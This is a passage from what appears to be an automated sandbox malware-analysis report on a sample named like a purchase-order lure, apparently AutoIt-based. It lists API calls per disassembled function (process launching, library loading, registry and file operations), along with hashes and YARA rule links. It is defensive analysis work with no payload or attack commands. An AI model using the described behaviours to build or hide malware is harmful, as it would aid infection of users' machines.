                          • API String ID: 839392675-0
                          • Opcode ID: c7da43acc9ad7231c170ab8b6538f4a77281a700e57e9c547ccc7ac53782324b
                          • Instruction ID: d96ab40aa231c3cfa030dc76a585107ba51b9347d05c94d83cb3e0ef2941854c
                          • Opcode Fuzzy Hash: c7da43acc9ad7231c170ab8b6538f4a77281a700e57e9c547ccc7ac53782324b
                          • Instruction Fuzzy Hash: E2F05E7264015CBBE7215B629C0EEEF3E7CEFCAB11F00015AF601D1091D7A05A01EAF9
                          Function 00F57439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetClientRect.USER32(?), ref: 00F57452
                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 00F57469
                          • GetWindowDC.USER32(?), ref: 00F57475
                          • GetPixel.GDI32(00000000,?,?), ref: 00F57484
                          • ReleaseDC.USER32(?,00000000), ref: 00F57496
                          • GetSysColor.USER32(00000005), ref: 00F574B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                          • String ID:
                          • API String ID: 272304278-0
                          • Opcode ID: e74fedffd6e1d5d6982237b4f91ec461536b655a6516db6b7fb75375a83e56f4
                          • Instruction ID: 53355e50e287de9ac1d7e222af2bc32f7ef58fa345646d120a941cdb9df9fbec
                          • Opcode Fuzzy Hash: e74fedffd6e1d5d6982237b4f91ec461536b655a6516db6b7fb75375a83e56f4
                          • Instruction Fuzzy Hash: 32014F32404219EFDB519F64DC08BA97BB5FB04321F554165FE19A21A1CB311D51BB90
                          Function 00F61874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F6187F
                          • UnloadUserProfile.USERENV(?,?), ref: 00F6188B
                          • CloseHandle.KERNEL32(?), ref: 00F61894
                          • CloseHandle.KERNEL32(?), ref: 00F6189C
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00F618A5
                          • HeapFree.KERNEL32(00000000), ref: 00F618AC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                          • String ID:
                          • API String ID: 146765662-0
                          • Opcode ID: 36895437550d0c51ee2a01f0294f989229a6c84ffbf07bd73d5cca5b6766eec4
                          • Instruction ID: 800416b7d95f125e44a37e01c5ebf9ea8a4f2fedbb9319adb9e5c3cefc82378d
                          • Opcode Fuzzy Hash: 36895437550d0c51ee2a01f0294f989229a6c84ffbf07bd73d5cca5b6766eec4
                          • Instruction Fuzzy Hash: E8E0E536404109BBEB015FA2EE0CD0ABF39FF49B22B108222F22581071CB329460EFA4
                          Function 00F6C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F07620: _wcslen.LIBCMT ref: 00F07625
                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F6C6EE
                          • _wcslen.LIBCMT ref: 00F6C735
                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F6C79C
                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F6C7CA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ItemMenu$Info_wcslen$Default
                          • String ID: 0
                          • API String ID: 1227352736-4108050209
                          • Opcode ID: 909088d86dc75a9b2c8d18c120c553e6781e7f1f8cc96367ad405158bd43d25b
                          • Instruction ID: ddbf53f162c6cf9d61f9375a5060fd81ee35c1495f2f189e29b7f5b3c7be4d6e
                          • Opcode Fuzzy Hash: 909088d86dc75a9b2c8d18c120c553e6781e7f1f8cc96367ad405158bd43d25b
                          • Instruction Fuzzy Hash: AE51AD71A043019BD7149F28CC85B7B77E8AB89324F080A2AF9D5D31E1DB64D944BBD6
                          Function 00F8AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                          Download Yara Rule
                          APIs
                          • ShellExecuteExW.SHELL32(0000003C), ref: 00F8AEA3
                            • Part of subcall function 00F07620: _wcslen.LIBCMT ref: 00F07625
                          • GetProcessId.KERNEL32(00000000), ref: 00F8AF38
                          • CloseHandle.KERNEL32(00000000), ref: 00F8AF67
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CloseExecuteHandleProcessShell_wcslen
                          • String ID: <$@
                          • API String ID: 146682121-1426351568
                          • Opcode ID: 944c1632aaa6ed734ebf8a11ba7565fb3cfd6443319d1b675d05c3ad808492bd
                          • Instruction ID: 651b2af5eb3be57a18f2942df6c0247180ecdfe67afe80d88faac5f6d88914bb
                          • Opcode Fuzzy Hash: 944c1632aaa6ed734ebf8a11ba7565fb3cfd6443319d1b675d05c3ad808492bd
                          • Instruction Fuzzy Hash: 16716D71A00619DFDB14EF55C884A9EBBF0FF08314F04849AE816AB392CB75ED45EB91
                          Function 00F6719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F67206
                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F6723C
                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F6724D
                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F672CF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorMode$AddressCreateInstanceProc
                          • String ID: DllGetClassObject
                          • API String ID: 753597075-1075368562
                          • Opcode ID: 0e4200e18da65b144db3d4b59019889e94f5061b165e098ad946c7875942a0ea
                          • Instruction ID: 9b25a46407a9120599a9f10f778aa7e8d187715e0495fa745bc4e03651c0e246
                          • Opcode Fuzzy Hash: 0e4200e18da65b144db3d4b59019889e94f5061b165e098ad946c7875942a0ea
                          • Instruction Fuzzy Hash: 4B417C71A04304EFDB15DF54C895B9A7BB9EF44318F1480AABD059F24AD7B0D944EFA0
                          Function 00F93D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F93E35
                          • IsMenu.USER32(?), ref: 00F93E4A
                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F93E92
                          • DrawMenuBar.USER32 ref: 00F93EA5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Menu$Item$DrawInfoInsert
                          • String ID: 0
                          • API String ID: 3076010158-4108050209
                          • Opcode ID: f7e4d55414556cb387c11d245dcdb4db903bbdadaee361511ab8b1a053426b1c
                          • Instruction ID: 529074429b988ac604f0501d088669fe84b367bc5a33f84e9b28fdf7745aeea8
                          • Opcode Fuzzy Hash: f7e4d55414556cb387c11d245dcdb4db903bbdadaee361511ab8b1a053426b1c
                          • Instruction Fuzzy Hash: ED413B75A01209EFEF10EF60D884EAABBB5FF49364F044129F90597250D730AE49EF90
                          Function 00F61DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                            • Part of subcall function 00F63CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F63CCA
                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F61E66
                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F61E79
                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00F61EA9
                            • Part of subcall function 00F06B57: _wcslen.LIBCMT ref: 00F06B6A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$_wcslen$ClassName
                          • String ID: ComboBox$ListBox
                          • API String ID: 2081771294-1403004172
                          • Opcode ID: d2faabfbbb9659444c160424018411cc022ddd94988c5a5336df92c03afd29d6
                          • Instruction ID: 84571f10aa0ceed939af02b40d01639cab25f6350517fda3523ec20ed0894af6
                          • Opcode Fuzzy Hash: d2faabfbbb9659444c160424018411cc022ddd94988c5a5336df92c03afd29d6
                          • Instruction Fuzzy Hash: 6C212772E00108BEDB14AB64DC46DFFBBB8EF55360B184119F825A71E1DB799D09B620
                          Function 00F92F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F92F8D
                          • LoadLibraryW.KERNEL32(?), ref: 00F92F94
                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F92FA9
                          • DestroyWindow.USER32(?), ref: 00F92FB1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$DestroyLibraryLoadWindow
                          • String ID: SysAnimate32
                          • API String ID: 3529120543-1011021900
                          • Opcode ID: cddace352de35e61d7b6e1177b25c089b885c36238d21358695a51faddfe619d
                          • Instruction ID: f78635e9db0e0e05a3d339ec132b235141cc5bdfeb062a05909e5b76df7453ec
                          • Opcode Fuzzy Hash: cddace352de35e61d7b6e1177b25c089b885c36238d21358695a51faddfe619d
                          • Instruction Fuzzy Hash: 68217772A00209BBFF508F649C80EBB37B9EB59368F100619FA5496190D771DC51B7A0
                          Function 00F24D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F24D1E,00F328E9,?,00F24CBE,00F328E9,00FC88B8,0000000C,00F24E15,00F328E9,00000002), ref: 00F24D8D
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F24DA0
                          • FreeLibrary.KERNEL32(00000000,?,?,?,00F24D1E,00F328E9,?,00F24CBE,00F328E9,00FC88B8,0000000C,00F24E15,00F328E9,00000002,00000000), ref: 00F24DC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 08883e8b6040ef31f8a8d48b840282aa11b7f451653c1a4ad2e619d30e2a4c11
                          • Instruction ID: fc7f31415d907e133effab248b505f330ecbec5943ec6af9d7714d038e6e909c
                          • Opcode Fuzzy Hash: 08883e8b6040ef31f8a8d48b840282aa11b7f451653c1a4ad2e619d30e2a4c11
                          • Instruction Fuzzy Hash: D3F04F35A4021CBBDB119F90EC49BADBBB5EF44752F4001A5F909A2660CF74AD80EAD5
                          Function 00F04E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F04EDD,?,00FD1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F04E9C
                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F04EAE
                          • FreeLibrary.KERNEL32(00000000,?,?,00F04EDD,?,00FD1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F04EC0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Library$AddressFreeLoadProc
                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                          • API String ID: 145871493-3689287502
                          • Opcode ID: 3724f398a6dada45b7da9c0a7343138209bc8c5fbe670135fed681b37cf39683
                          • Instruction ID: 75a8c091f076cc012d6ae0ff3042fbb10077a63c3802a3847c79098e3e76fc2f
                          • Opcode Fuzzy Hash: 3724f398a6dada45b7da9c0a7343138209bc8c5fbe670135fed681b37cf39683
                          • Instruction Fuzzy Hash: DCE08635E015225BD2221B25BC19B5B7554AF81B767450116FE04D3150DB60DD4270E5
                          Function 00F04E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F43CDE,?,00FD1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F04E62
                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F04E74
                          • FreeLibrary.KERNEL32(00000000,?,?,00F43CDE,?,00FD1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F04E87
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Library$AddressFreeLoadProc
                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                          • API String ID: 145871493-1355242751
                          • Opcode ID: 9eb362aab14ab1a7b8bde9377caa0ad33d7a1db61e9b75016dabaad5719e2eba
                          • Instruction ID: edbaab2faf74c1600d507d859d8ae5008f538655c77f597124c8be50c0b948d2
                          • Opcode Fuzzy Hash: 9eb362aab14ab1a7b8bde9377caa0ad33d7a1db61e9b75016dabaad5719e2eba
                          • Instruction Fuzzy Hash: DED0C231902622579A221B24BC08E8B3A18AF81B65305051AFB08A3194CF20CD41B1D4
                          Function 00F8A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcessId.KERNEL32 ref: 00F8A427
                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F8A435
                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F8A468
                          • CloseHandle.KERNEL32(?), ref: 00F8A63D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Process$CloseCountersCurrentHandleOpen
                          • String ID:
                          • API String ID: 3488606520-0
                          • Opcode ID: 9bb70e414870a9e31c1fcee745ae366cb376919b83ce4adea63f470735f1595b
                          • Instruction ID: 4f6e4472fcd66e8f27d304ca91ad315904b4cca31570e8adbdd91857598b8771
                          • Opcode Fuzzy Hash: 9bb70e414870a9e31c1fcee745ae366cb376919b83ce4adea63f470735f1595b
                          • Instruction Fuzzy Hash: 91A1AF716043019FE720EF28CC86F6AB7E1AF84714F14885DF55A9B2D2DBB4EC419B92
                          Function 00F6E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F6DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F6CF22,?), ref: 00F6DDFD
                            • Part of subcall function 00F6DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F6CF22,?), ref: 00F6DE16
                            • Part of subcall function 00F6E199: GetFileAttributesW.KERNEL32(?,00F6CF95), ref: 00F6E19A
                          • lstrcmpiW.KERNEL32(?,?), ref: 00F6E473
                          • MoveFileW.KERNEL32(?,?), ref: 00F6E4AC
                          • _wcslen.LIBCMT ref: 00F6E5EB
                          • _wcslen.LIBCMT ref: 00F6E603
                          • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00F6E650
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                          • String ID:
                          • API String ID: 3183298772-0
                          • Opcode ID: d1844900983037dcdcd256dbc9a9c1f478970dede54f25d9894aca9ec0631d7d
                          • Instruction ID: 7af69ce596ab098352350fef6675ab7e7462228ab19dc7bcdb7746312b48472f
                          • Opcode Fuzzy Hash: d1844900983037dcdcd256dbc9a9c1f478970dede54f25d9894aca9ec0631d7d
                          • Instruction Fuzzy Hash: FE5195B74083859BC724EBA0DC819DF73ECAF85350F00491EF689D3191EF78A588A766
                          Function 00F8B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                            • Part of subcall function 00F8C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F8B6AE,?,?), ref: 00F8C9B5
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8C9F1
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8CA68
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8CA9E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F8BAA5
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F8BB00
                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F8BB63
                          • RegCloseKey.ADVAPI32(?,?), ref: 00F8BBA6
                          • RegCloseKey.ADVAPI32(00000000), ref: 00F8BBB3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                          • String ID:
                          • API String ID: 826366716-0
                          • Opcode ID: 3804fa43fafac84934fd1bf633febc359f4f8cbbda26ff0731d3bb0c3b1c62bf
                          • Instruction ID: 359b685770ebbb47848b7499393507a2d328bd9d358cc1f816aff65423ab8e03
                          • Opcode Fuzzy Hash: 3804fa43fafac84934fd1bf633febc359f4f8cbbda26ff0731d3bb0c3b1c62bf
                          • Instruction Fuzzy Hash: 9061F331608241EFD314EF14C890E6ABBE5FF84318F54859CF4998B2A2DB35ED45EB92
                          Function 00F68BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00F68BCD
                          • VariantClear.OLEAUT32 ref: 00F68C3E
                          • VariantClear.OLEAUT32 ref: 00F68C9D
                          • VariantClear.OLEAUT32(?), ref: 00F68D10
                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F68D3B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Variant$Clear$ChangeInitType
                          • String ID:
                          • API String ID: 4136290138-0
                          • Opcode ID: 9877d0a328fddc6689d3dabe18b9a83777149f5260702f971306f4b27775589f
                          • Instruction ID: bddb24c45ef3f44c747f65e092ff4489e516118a5c631abb3ce14b78f7fe6b39
